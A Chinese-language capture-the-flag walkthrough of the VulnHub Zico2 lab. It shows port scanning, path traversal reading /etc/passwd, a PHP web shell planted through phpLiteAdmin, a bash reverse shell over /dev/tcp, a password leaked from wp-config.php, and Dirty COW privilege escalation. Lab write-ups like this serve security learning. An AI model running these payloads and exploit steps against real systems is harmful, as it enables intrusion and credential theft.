前言
⏰时间:2023.7.29
🗺️靶机地址:https://www.vulnhub.com/entry/zico2-1,210/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
信息收集
nmap发现主机
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.58.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 10:02 HKT
Nmap scan report for 192.168.58.1
Host is up (0.00029s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.58.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:EB:56:98 (VMware)
Nmap scan report for 192.168.58.162
Host is up (0.00024s latency).
MAC Address: 00:0C:29:70:7C:17 (VMware)
目标是192.168.58.162
设置目标为变量
masscan快速发现端口
┌──(root㉿kali)-[~]
└─# export T=192.168.58.162
┌──(root㉿kali)-[~]
└─# masscan --rate=100000 -p 1-65535 $T
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-07-29 02:04:23 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 111/tcp on 192.168.58.162
Discovered open port 80/tcp on 192.168.58.162
Discovered open port 22/tcp on 192.168.58.162
Discovered open port 48546/tcp on 192.168.58.162
nmap进一步探测
──(root㉿kali)-[~]
└─# nmap -A -p 22,80,111,48546 $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 10:06 HKT
Nmap scan report for 192.168.58.162
Host is up (0.00025s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39109/tcp6 status
| 100024 1 45393/udp status
| 100024 1 47475/udp6 status
|_ 100024 1 48546/tcp status
48546/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:70:7C:17 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
为方便操作,将80端口网站添加hosts
echo '192.168.58.162 t' | tee -a /etc/hosts
访问t:80即可
使用awvs扫描
发现存在文件包含
┌──(root㉿kali)-[~]
└─# curl http://t/view.php?page=../../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
zico:x:1000:1000:,,,:/home/zico:/bin/bash
而且还扫出来个phpliteadmin登录口
phpLiteadmin写shell
直接admin登录
在create new database下输入haha.php,点击create即创建
点击change database下面的haha.php,即切换到haha.php
创建表
default value中写入:
<?php system($_GET[cmd]);?>
然后到insert里面点击insert
即可执行命令
反弹shell
不支持nc -e
用bash反弹shell
bash -c 'bash -i >& /dev/tcp/192.168.58.153/5555 0>&1'
url编码一下
进入zico
看下home目录
发现wordpress下的wp-config.php,拿到密码
sWfCsfJSPV9H3AmQzw8,尝试切换到zico用户
需要先用python开启稳定shell才能su切换用户
python -c 'import pty;pty.spawn("/bin/bash")'
dirtycow提权
脚本地址:https://www.exploit-db.com/exploits/40839
uname -a
cd /tmp
wget http://192.168.58.153:3333/dirty.c
gcc -pthread dirty.c -o exp -lcrypt
chmod 777 exp
./exp 123456
su firefart
ls /root
cat /root/flag.txt